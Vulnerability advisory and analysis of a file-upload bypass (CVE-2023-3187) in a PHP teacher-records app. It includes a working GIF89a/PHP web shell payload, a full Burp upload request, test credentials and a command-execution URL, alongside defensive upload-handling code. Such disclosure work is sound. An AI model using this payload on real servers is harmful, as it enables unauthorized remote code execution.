Teachers Record Management System 1.0 - File Upload Type Validation

Exploit Author: AFFAN AHMED
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: PHP
Published Date: 2023-06-13
Exploit Title: Teachers Record Management System 1.0 – File Upload Type Validation
Date: 17-01-2023
EXPLOIT-AUTHOR: AFFAN AHMED
Vendor Homepage: <https://phpgurukul.com>
Software Link: <https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/>
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE : CVE-2023-3187

===============================
STEPS_TO_REPRODUCE
===============================
1. Log in to the Teacher account with the credentials “Username: jogoe12@yourdomain.com, Password: Test@123”
2. Navigate to Profile Section and edit the Profile Pic by clicking on Edit Image
3. Open the Burp-suite and Intercept the Edit Image Request
4. In the POST request, change the filename of the file part from “profile picture.png” to “profile picture.php.gif”
5. Change the Content-Type of the file part from “image/png” to “image/gif”
6. Replace the file body with this payload: `GIF89a <?php echo system($_REQUEST['dx']); ?>`
7. GIF89a is the GIF magic-byte signature. It makes the body look like a valid GIF to any check that sniffs the first bytes of the file, while the .php.gif double extension is what gets the name past the extension check and still leaves .php in it; the PHP tag after the signature is the web shell.
8. Below is the Burp Suite POST request with all of the changes made above

==========================================
BURPSUITE_REQUEST
==========================================
POST /trms/teacher/changeimage.php HTTP/1.1
Host: localhost
Content-Length: 442
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/trms/teacher/changeimage.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc
Connection: close

------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="subjects"

John Doe
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"
Content-Type: image/gif

GIF89a <?php echo system($_REQUEST['dx']); ?>

------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="submit"


------WebKitFormBoundaryndAPYa0GGOxSUHdF--


===============================
PROOF_OF_CONCEPT
===============================
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.md


Exploiting File Upload Type Validation in Teachers Record Management System 1.0: A Deep Dive into CVE-2023-3187

Security vulnerabilities in web applications often stem from seemingly minor oversights in input validation and file handling. One such vulnerability, CVE-2023-3187, was discovered in the Teachers Record Management System 1.0 — a PHP-based application developed by PHP Gurukul. This flaw allows attackers to bypass file upload restrictions by manipulating file extensions and MIME types, leading to remote code execution (RCE). The exploit, documented by Affan Ahmed, highlights a critical failure in secure file upload practices.

Understanding the Vulnerability: File Upload Type Validation Bypass

File upload functionality is common in web applications, especially in systems that manage user profiles, documents or media, and when it is implemented poorly it becomes a gateway for malicious payloads. In this case the Teachers Record Management System lets teachers upload a profile picture through the form at /trms/teacher/changeimage.php. The checks the upload goes through look only at values the client controls: the extension of the submitted file name (e.g. .png or .jpg) and the Content-Type of the multipart part. Neither says anything about what the bytes really are, and neither stops the stored file from later being handed to the PHP interpreter.

The attacker exploits this with a polyglot. The file name profile picture.php.gif ends in an allowed image extension, so it passes a check that looks at the last extension, while still carrying .php in the name. The body starts with the GIF signature GIF89a followed by PHP code. That six-byte signature satisfies any check that sniffs the start of the file (a trusted Content-Type, libmagic, a magic-byte comparison), so the server treats the upload as a valid GIF even though what follows the header is a web shell rather than image data.
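To make the bypass concrete, here is an added example (not code from Teachers Record Management System or from the advisory's author) that replays the polyglot from the Burp request against the three checks a naive PHP upload handler typically performs. The inputs are constructed to match the request above; the check code is illustrative of common patterns, not the vendor's implementation, and the GD call is only used if the extension is loaded.

```php
<?php
// Added example: why each common upload check passes the advisory's polyglot.
// Inputs below are constructed from the Burp request; the checks are illustrative.
declare(strict_types=1);

$filename   = 'profile picture.php.gif';                          // Content-Disposition filename
$clientType = 'image/gif';                                        // Content-Type of the file part
$contents   = "GIF89a <?php echo system(\$_REQUEST['dx']); ?>";  // file body from the advisory

// Check A: allowlist on the *last* extension only.
$allowedExt = ['gif', 'png', 'jpg', 'jpeg'];
$lastExt    = strtolower(pathinfo($filename, PATHINFO_EXTENSION)); // "gif"
$passExt    = in_array($lastExt, $allowedExt, true);

// Check B: trusting $_FILES['newpic']['type'], which is just the client's Content-Type header.
$allowedMime    = ['image/gif', 'image/png', 'image/jpeg'];
$passClientMime = in_array($clientType, $allowedMime, true);

// Check C: server-side sniffing with fileinfo. libmagic classifies GIFs by the "GIF8"
// prefix, so the GIF89a stub is reported as image/gif regardless of what follows it.
$sniffedMime = (new finfo(FILEINFO_MIME_TYPE))->buffer($contents);
$passSniff   = in_array($sniffedMime, $allowedMime, true);

// What the same inputs look like to checks that actually matter.
$hasScriptExt = (bool) preg_match('/\.(php\d?|phtml|phar)\./i', $filename); // script ext anywhere in name
$hasPhpTag    = strpos($contents, '<?php') !== false;
$decodes      = function_exists('imagecreatefromstring')
    ? (@imagecreatefromstring($contents) !== false)  // GD needs real image data after the header
    : null;                                           // NULL when the GD extension is absent

printf("%-40s %s\n",      'A. last extension in allowlist:',      var_export($passExt, true));
printf("%-40s %s\n",      'B. client Content-Type in allowlist:', var_export($passClientMime, true));
printf("%-40s %s (%s)\n", 'C. libmagic sniff in allowlist:',      var_export($passSniff, true), $sniffedMime);
printf("%-40s %s\n",      'script extension inside the name:',    var_export($hasScriptExt, true));
printf("%-40s %s\n",      'PHP open tag in the body:',            var_export($hasPhpTag, true));
printf("%-40s %s\n",      'decodes as an image with GD:',         var_export($decodes, true));
```

Run with `php check.php` (hypothetical file name). Checks A, B and C all report true for the polyglot, which is exactly the situation the advisory describes: the name, the client's Content-Type and even a server-side signature sniff agree the upload is a GIF. Only looking for a script extension anywhere in the name, or requiring the bytes to decode as an image, separates it from a real picture.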

Step-by-Step Exploitation Process

The following steps demonstrate how an attacker can leverage this vulnerability to execute arbitrary commands on the server:

  • Authentication: The attacker logs in using a known credential pair: Username: jogoe12@yourdomain.com and Password: Test@123.
  • Targeting the Upload Endpoint: Once logged in, the attacker navigates to the profile section and selects the “Edit Image” option.
  • Intercepting the Request: Using Burp Suite, the attacker captures the POST request sent to changeimage.php.
  • Manipulating File Metadata: The attacker modifies:
    • filename from profile picture.png to profile picture.php.gif
    • Content-Type from image/png to image/gif
  • Injecting Malicious Payload: The attacker replaces the file body with the following payload:
    GIF89a <?php echo system($_REQUEST['dx']); ?>

    The payload starts with the GIF header GIF89a to satisfy MIME and signature checks, followed by a PHP script that passes the value of the dx request parameter (GET or POST, since $_REQUEST is used) to system() and echoes the command output.

Proof of Concept: The Burp Suite Request

The modified POST request demonstrates the exploit’s mechanics:

POST /trms/teacher/changeimage.php HTTP/1.1
Host: localhost
Content-Length: 442
Cache-Control: max-age=0
...
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF
...
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"
Content-Type: image/gif

GIF89a <?php echo system($_REQUEST['dx']); ?>

------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="submit"
...

When this request is sent, the server accepts the file as a GIF on the strength of the Content-Type header and the GIF signature, and stores it under the web root with its .php.gif name. Whether that name is then executed as PHP depends on how the web server maps the PHP handler: a configuration that attaches the handler to any .php segment in a file name (the Apache AddHandler pattern) will run it, and that is what the double extension is there for. Once it runs, the code after the six-byte header is an ordinary PHP web shell.

Exploitation Outcome: Remote Code Execution

After uploading the malicious file, the attacker executes commands by requesting the uploaded file with a dx parameter (the space in the name is sent URL-encoded as %20). For example:

http://localhost/trms/uploads/profile picture.php.gif?dx=whoami

The PHP in the uploaded file hands the dx value to system(), which runs whoami with the privileges of the web server process and echoes the result into the response. This is full remote code execution, a critical security breach.

Why This Vulnerability Matters

File upload validation is a foundational security control. When a system relies only on file extensions or client-supplied MIME types without inspecting the actual content, it opens the door to file-based attacks. This vulnerability is not unique; the same pattern has been reported in CMS platforms, file-sharing applications and many other PHP web applications.

Key takeaways:

  • File extension validation alone is insufficient: a name ending in .gif can still contain PHP code, and a double extension such as .php.gif can satisfy the extension check while keeping .php in the name.
  • MIME type can be spoofed: the multipart Content-Type is chosen by the client, and even server-side signature sniffing is satisfied by a valid GIF89a header.
  • Malicious file content can be executed: if the uploaded file is stored under the web root with a name the PHP handler matches, it becomes a vector for RCE.

Security Best Practices to Prevent Such Exploits

To prevent vulnerabilities like CVE-2023-3187, developers should implement the following defenses:

Best practice                       Explanation
----------------------------------  ---------------------------------------------------------------------------------------------------------
Inspect content, not metadata       Determine the type server-side (the file command, PHP's finfo or mime_content_type()) instead of trusting the client's name or Content-Type. A signature check alone is not enough, since this exploit passes one with the GIF89a stub: decode the image and re-encode it from the decoded pixels before storing it, so nothing but image data survives.
Sanitize file names                 Never reuse the client's name. Keep a server-side allowlist of image extensions (.png, .jpg, .jpeg, .gif), derive the stored extension from the detected type, and reject names with a script extension anywhere in them (profile.php.gif).
Store files outside the web root    Upload to a directory that is not reachable over HTTP and serve images through a script with a fixed Content-Type. If uploads must live under the web root, disable the PHP handler for that directory.
Use randomized file names           Generate unique, unpredictable names (for example random hex plus the chosen extension) so an attacker cannot guess the path of an upload or overwrite another user's file. This complements name sanitization; it does not replace it.
Validate file headers               Check the magic bytes (GIF87a/GIF89a for GIF, 89 50 4E 47 0D 0A 1A 0A for PNG, FF D8 FF for JPEG) as a cheap first filter, knowing it rules out only obvious mismatches and is defeated by a polyglot whose header is valid.
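The following is an added example, not code from Teachers Record Management System or from PHP Gurukul, of an upload path that applies the practices in the table above and rejects the polyglot from the advisory. The function names (store_profile_image, handle_changeimage, serve_profile_image), the field name newpic and the storage directory are assumptions for the example; it requires PHP's fileinfo and GD extensions.

```php
<?php
// Added example: validate, re-encode and store a profile image, then serve it from
// outside the web root. Names and paths are assumed for illustration.
declare(strict_types=1);

const MAX_IMAGE_BYTES = 2 * 1024 * 1024;

// Stored format is chosen from the detected type, never from the client's name or Content-Type.
const IMAGE_WRITERS = [
    'image/png'  => ['ext' => 'png', 'write' => 'imagepng'],
    'image/jpeg' => ['ext' => 'jpg', 'write' => 'imagejpeg'],
    'image/gif'  => ['ext' => 'gif', 'write' => 'imagegif'],
];

// Validates the file at $tmpPath, re-encodes it and stores it under a random name in
// $storeDir (a directory outside the document root). Returns the stored name or throws.
// The original bytes are never written to the store.
function store_profile_image(string $tmpPath, string $storeDir): string
{
    $size = filesize($tmpPath);
    if ($size === false || $size === 0 || $size > MAX_IMAGE_BYTES) {
        throw new RuntimeException('rejected: empty or oversized upload');
    }
    // Server-side sniff. On its own this is fooled by the GIF89a stub, so it only
    // picks the writer; it is not the decision to accept the file.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!isset(IMAGE_WRITERS[$mime])) {
        throw new RuntimeException("rejected: unsupported type {$mime}");
    }
    // The real check: the bytes must decode as an image. The polyglot has a GIF
    // header but no image data behind it, so GD refuses it here.
    $img = @imagecreatefromstring((string) file_get_contents($tmpPath));
    if ($img === false) {
        throw new RuntimeException('rejected: not a decodable image');
    }
    // Re-encode from the decoded pixels: the output contains only what GD writes,
    // so PHP (or anything else) smuggled in the original bytes is dropped.
    $ext    = IMAGE_WRITERS[$mime]['ext'];
    $name   = bin2hex(random_bytes(16)) . '.' . $ext;   // unpredictable, no client-controlled characters
    $target = rtrim($storeDir, '/') . '/' . $name;
    $writer = IMAGE_WRITERS[$mime]['write'];
    $ok     = $writer($img, $target);
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('failed to write re-encoded image');
    }
    return $name;
}

// Form handler: accepts only a genuine upload and ignores ['name'] and ['type'] entirely.
function handle_changeimage(array $files, string $storeDir): string
{
    if (!isset($files['newpic']) || $files['newpic']['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('no file uploaded');
    }
    if (!is_uploaded_file($files['newpic']['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    return store_profile_image($files['newpic']['tmp_name'], $storeDir);
}

// Serving side (a separate script such as image.php?id=<name>): streams from outside
// the web root with a fixed Content-Type, so nothing in the store is ever executed.
function serve_profile_image(string $name, string $storeDir): void
{
    if (!preg_match('/^[0-9a-f]{32}\.(png|jpg|gif)$/', $name)) { // only names we generate
        http_response_code(404);
        return;
    }
    $path = rtrim($storeDir, '/') . '/' . $name;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    $types = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'gif' => 'image/gif'];
    header('Content-Type: ' . $types[substr($name, -3)]);
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: inline; filename="' . $name . '"');
    readfile($path);
}

// CLI self-check with constructed inputs: the advisory's polyglot must be rejected,
// a real GIF must be accepted and come back under a generated name.
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . '/trms_uploads_demo';
    @mkdir($dir, 0700);
    $poly = tempnam($dir, 'p');
    file_put_contents($poly, "GIF89a <?php echo system(\$_REQUEST['dx']); ?>");
    try {
        echo "polyglot stored as: " . store_profile_image($poly, $dir) . " (unexpected)\n";
    } catch (RuntimeException $e) {
        echo "polyglot: {$e->getMessage()}\n";
    }
    $real = tempnam($dir, 'g');
    $gd = imagecreate(8, 8);
    imagecolorallocate($gd, 0, 0, 0);
    imagegif($gd, $real);
    imagedestroy($gd);
    echo "real gif stored as: " . store_profile_image($real, $dir) . "\n";
}
```

The decisive step is the decode-and-re-encode: every earlier check in this function is one the advisory's payload already passes. Serving through serve_profile_image() with a fixed Content-Type and nosniff means the stored name, extension and directory never reach the web server's handler mapping, which closes the double-extension route regardless of how the PHP handler is configured.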

Conclusion: Lessons from CVE-2023-3187

The Teachers Record Management System 1.0 vulnerability serves as a stark reminder that security is not just about checking file extensions — it’s about understanding the full context of file handling. Attackers exploit the gap between what a file claims to be and what it actually contains.

As cybersecurity professionals, we must advocate for layered defense strategies. Never trust file metadata alone. Always validate content, restrict file access, and enforce strict input sanitization. This single flaw — a misconfigured file upload — can lead to full server compromise, making it a prime example of why security should never be an afterthought.